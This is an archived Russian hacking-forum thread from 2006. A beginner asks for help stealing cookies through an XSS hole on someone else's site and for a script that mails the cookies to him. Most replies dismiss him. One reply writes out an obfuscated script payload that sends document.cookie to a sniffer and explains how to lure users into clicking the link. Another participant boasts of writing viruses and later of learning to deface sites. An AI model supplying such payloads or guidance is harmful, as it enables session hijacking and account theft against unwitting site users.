Учусь дефейсу
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Учусь дефейсу - 2006-07-23 16:13:10
|
|
|
QwertyDef
Сообщений: 1
Оценки: 0
Присоединился: 2006-07-23 15:58:28
|
Убедительная просьба помогите! Есть сайт с явной XSS дырой. Дыра заключается в следующем: при подстановке в параметры поиска строки < / s c r i p t > < s c r i p t >а1егt(''Hello'')< / s c r i p t > выдается алерт с "Hello". Пожалуйста дайте скрипт для пересылки кукисов на е-майл (желательно с описанием). Посоветуйте, на каком хостинге его лучше разместить?
P.S. Пожалуйста, не отсылайте меня на разные статьи по дефейсу, прочитал их немерянно!!!
Please HELP! ОООООЧЕНЬ хочу научиться дефейсить!!! [sm=10.gif]
|
|
|
|
|
Учусь дефейсу - 2006-07-23 20:47:31
|
|
|
rtw
Сообщений: 1372
Оценки: 0
Присоединился: 2004-08-19 00:28:05
|
да пошёл ты в маны! [sm=3.gif]
http://www.cgisecurity.com/articles/dx27.html#theft
|
|
|
|
|
Учусь дефейсу - 2006-08-01 02:18:46
|
|
|
хитрый_крыс
Сообщений: 5
Оценки: 0
Присоединился: 2006-07-31 18:07:16
|
Горячо присоединяюсь к просьбе Qwerty Def! Я умею только писать вири, а вот дела взлома никогда у меня нормально не шли. Плиз,расскажите "по шагам",как же эти дефейсы вообще делаются? Все эти статьи,они рассчитаны на то что чел должен догадываться сам и самого главного всегда умалчивают.По статьям ничему не научишся.
|
|
|
|
|
Учусь дефейсу - 2006-08-01 03:15:08
|
|
|
RPN
Сообщений: 5
Оценки: 0
Присоединился: 2006-07-26 09:50:54
|
Видео рулят
|
|
|
|
|
Учусь дефейсу - 2006-08-01 03:28:50
|
|
|
NG
Сообщений: 260
Оценки: 0
Присоединился: 2005-12-01 20:20:46
|
2QwertyDef
Ответ на твой вопрос есть в нете, так что ищи сам.
2хитрый_крыс
дефейсы делаются по разному, универсального способа просто нет.
поэтому и обьяснить по шагам это не возможно.
для каждого сайта свой подход.
|
|
|
|
|
Учусь дефейсу - 2006-08-01 20:38:38
|
|
|
Сhaos_Сode
Сообщений: 1049
Оценки: 0
Присоединился: 2006-01-12 11:54:12
|
Это пассивная XSS. Если параметры поиска передаются GET'ом, то теоретически можно запостить на форуме(а где кстати поисковик этот?) линк с яваскриптом <Sсгiрt>dосиmеnt.1осаtiоn.href = '/path/to/sniffer/'+dосиmеnt.cookie</Sсгiрt>. Вроде такой код. Может ошибся. Но врядли кто то на это поведется, если конечно это не форум домохояек ;) Если поведутся, то на сниффер тебе будут падать печенья юзеров.
|
|
|
|
|
Учусь дефейсу - 2006-08-01 21:41:00
|
|
|
eagleM
Сообщений: 127
Оценки: 0
Присоединился: 2004-12-14 22:43:26
|
еще один кидис… пора их остреливать(шутка :) )
|
|
|
|
|
Учусь дефейсу - 2006-08-02 14:23:13
|
|
|
OFF1genny_su1c1D
Сообщений: 103
Оценки: 0
Присоединился: 2006-02-18 11:21:27
|
Вири он писать умеет, а дефейсить не умеет.Ха, да чтоб нормальный вирь написать нужно архитектуру процессора знать, асм от корки до корки(для этого самого процессора) и много чего еще!
|
|
|
|
|
Учусь дефейсу - 2006-08-27 17:28:11
|
|
|
хитрый_крыс
Сообщений: 5
Оценки: 0
Присоединился: 2006-07-31 18:07:16
|
АСМ я знаю вполне хорошо для того чтобы скатать вирь. И дефейсить кстати теперь научился :).
Ну просто сначала долго не мог сообразить как это делается, и все.
|
|
|
|
|
|
